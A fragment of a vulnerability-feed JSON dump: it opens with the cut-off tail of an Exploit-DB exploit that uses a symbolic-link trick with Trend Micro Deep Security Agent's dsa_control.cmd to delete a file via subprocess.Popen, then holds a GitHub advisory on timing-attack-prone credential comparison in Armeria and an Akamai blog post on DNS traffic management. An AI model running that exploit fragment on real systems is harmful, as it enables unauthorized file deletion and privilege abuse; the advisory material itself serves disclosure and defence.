C:\\\\test\\\\test\\\\symtarget \\\"C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\dsa_control.cmd\\\" \\\"C:\\\\windows\\\\temp\\\\deleteme.txt\\\" d\"\r\nsubprocess.Popen(switcheroo, shell=True)\r\nwatcher1.run()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47751"}], "github": [{"lastseen": "2019-12-06T22:27:42", "bulletinFamily": "software", "description": "## Multiple timing attack vulnerabilities leading to the recovery of secrets based on the use of non-constant time compare function\r\n\r\n### Impact\r\n\r\nString comparison method in multiple authentication validation in Armeria were known to be vulnerable to timing attacks. This vulnerability is caused by the insecure implementation of `equals` method from `java.lang.String`. While this attack is not practically possible, an attacker still has a potential to attack if the victim's server validates user by using `equals` method.\r\n\r\nWe would like to thank @chrsow for pointing out the issue.\r\n\r\n## Potentially vulnerable codes\r\n\r\nhttps://github.com/line/armeria/blob/f0d870fde1088114070be31b67f7df0a21e835c6/core/src/main/java/com/linecorp/armeria/server/auth/OAuth2Token.java#L54\r\nhttps://github.com/line/armeria/blob/f0d870fde1088114070be31b67f7df0a21e835c6/core/src/main/java/com/linecorp/armeria/server/auth/BasicToken.java#L64\r\n\r\n### Patches\r\n\r\nThere are two options to patch this issue.\r\n\r\n1. Remove `equals` method; it has been exclusively used for test cases and was never used in any OSS projects that are using Armeria. (But it is worth noting that there are possibilities of closed projects authenticating users by utilizing `equals` method)\r\n\r\n2. Use `MessageDigest.isEqual` to compare the credential instead.\r\n\r\n### Workarounds\r\n\r\n1. Update to the latest version (TBD)\r\n\r\n2-1. Users can prevent these vulnerabilities by modifying and implementing timing attack preventions by themselves.\r\n\r\n2-2. 
Precisely speaking, credentials can be compared securely by calling the methods that directly return the input (namely `Object.accessToken()`, `Object.username()` and `Object.password()`) and comparing the returned values with a secure comparison.\r\n\r\n### References\r\n- https://cwe.mitre.org/data/definitions/208.html\r\n- https://security.stackexchange.com/questions/111040/should-i-worry-about-remote-timing-attacks-on-string-comparison\r\n\r\n### Side Note\r\n\r\nSince it is a theoretical attack, there is no PoC available from either the vendor or the security team.\r\n\r\n", "modified": "2019-12-06T18:54:03", "published": "2019-12-05T18:40:51", "id": "GHSA-24R8-FM9R-CPJ2", "href": "https://github.com/advisories/GHSA-24r8-fm9r-cpj2", "title": "Low severity vulnerability that affects com.linecorp.armeria:armeria", "type": "github", "cvss": {"score": 0.0, "vector": "NONE"}}], "akamaiblog": [{"lastseen": "2019-12-05T18:27:15", "bulletinFamily": "blog", "description": "### What is GTM\n\nGlobal Traffic Management, or GTM, is a DNS-based load balancing service that offers application owners a level of flexibility and insight that is unmatched by traditional on-prem solutions. Highly scalable and fault-resilient, GTM offers customers a layer of abstraction between endpoints, so traffic can be easily shifted between targets. However, the platform is not limited to weighted load distribution: GTM can execute intelligent routing decisions based on end-user location, network conditions, and even origin server availability. These features are possible thanks to Akamai's unrivaled visibility into the Internet, which fuels the platform's dynamic, data-based route optimization engine.\n\n### Front-End GTM\n\nDNS level load balancing affords domain owners the opportunity to potentially regulate traffic splits _before any HTTP layer requests are even sent_. 
Traditionally classified as \"front-end\" GTM, a property can be configured to control the destination of the initial incoming client request (first circle pictured below):\n\n\n\nWhile GTM traditionally balances traffic between origin data centers in the _second_ _leg_, Front-End GTM can assist with a number of important use cases as well.\n\n### Deployments Made Easier\n\nOne primary example--let's say you are onboarding a hostname onto Akamai's CDN for the first time to procure much-needed performance and security improvements. Without front-end GTM in place, the go-live step will entail updating the applicable hostname's DNS record, and pointing the entry to the new CDN hostname (which will resolve to an Akamai server IP). This deployment method requires transitioning _all_ traffic over to the Akamai configuration at once, however, and rollback may prove cumbersome. If the DNS record points to a GTM property instead, domain owners have the option of easing traffic over to the new Akamai CDN hostname in increments. Simply put, domain owners can 'Akamaize' as much or as little traffic as they see fit during the initial deployment (and increase the ratio over time). In addition, rollback is considerably easier, as shifting 100% of traffic back to the legacy architecture is as simple as a few clicks in the portal. If a more programmatic switch is preferred, GTM offers an API to manage traffic splits, and liveness tests can facilitate automatic failover if errors are detected.\n\n\n\nAnother great use case is deploying a new Akamai certificate. Let's say your security team wants to transition a hostname to another certificate -- or perhaps an important cipher upgrade / TLS version change is required. While these are typically harmless deployments, GTM provides the option to introduce these changes with a phased approach. The application owner simply needs to establish a new Akamai CDN hostname and associate it with the new certificate. 
From there, GTM can balance traffic between the old and new certificate settings in the desired manner.\n\n\n\n### Conclusion\n\nWithout GTM, these enhancements are 'all-or-nothing' deployments and rollback can prove tedious. However, GTM allows these changes to be deployed and retracted seamlessly, granting application owners a comforting level of flexibility and control.\n\nFront-End GTM has many other use cases as well (sending traffic to different endpoints based on geolocation, blocking users based on location, etc.) but phasing in DNS level changes is an often-overlooked benefit. If you have any questions about how front-end (or back-end) GTM can assist with your load balancing needs, please reach out to your Akamai technical representatives or check out the resources below.\n\n### Explore Akamai's Diverse DNS Oriented Solutions\n\nIf you find this blog useful, continue your exploration with these references. Everything Akamai deploys depends on our Intelligent Edge DNS platform. Akamai expands our platform to enable a range of services for our customers:\n\n * Achieve domain stability and resilience with Akamai's [Fast DNS service](<https://www.akamai.com/us/en/products/security/fast-dns.jsp>). The White Paper - [**Designing DNS for Availability and Resilience against DDoS Attacks**](<https://content.akamai.com/gl-en-pg9295-fast-dns-wp-designing-dns-for-availability.html>)** explains how Akamai deploys Fast DNS with multiple vectors of global resilience. 
**\n * Load balance your data centers, cloud deployments, and CDNs with Akamai's Cloud-Based [Global Server Load Balancing (GSLB) solution - GTM](<https://www.akamai.com/uk/en/products/performance/global-traffic-management.jsp>).\n * Massively scale your application with layer 7 load balancing with Akamai's [Application Load Balancer (ALB) Cloudlet](<https://www.akamai.com/us/en/products/performance/cloudlets/application-load-balancer.jsp>).\n * Ensure every device in your network checks a DNS security tool - ensuring the domain name resolved DOES NOT result in exposure to malware, phishing, or a botnet. Akamai's [Enterprise Threat Protector](<https://www.akamai.com/us/en/products/security/enterprise-threat-protector.jsp>) (ETP) and [DNSi/SPS solutions](<https://www.akamai.com/us/en/products/network-operator/dnsi-cacheserve.jsp>) turn your DNS resolver into a security tool.\n * [Sign up and Search Akamai's Community](<https://community.akamai.com/customers/s/?language=en_US>). This provides you access to a range of Akamai resources.\n * [DevOps Professionals](<https://developer.akamai.com/>) are welcome to join [developers.akamai.com](<https://developer.akamai.com/>). Akamai's DNS solutions are API and DevOps aligned ... enabling cloud to cloud innovation.\n\n[Use this form to ask for Akamai's help.](<https://www.akamai.com/uk/en/contact-us/>) We can have someone contact you to help with your DNS questions.\n\n", "modified": "2019-12-05T17:08:12", "published": "2019-12-05T17:00:00", "id": "AKAMAIBLOG:F7D2247A0218B794BB6BD2726CE9083D", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/En1sn9zlMcg/managing-traffic-from-the-outset---how-gtm-can-make-your-deployments-easier.html", "type": "akamaiblog", "title": "Managing Traffic From the Outset - How GTM Can Make Your Deployments Easier", "cvss": {"score": 0.0, "vector": "NONE"}}]}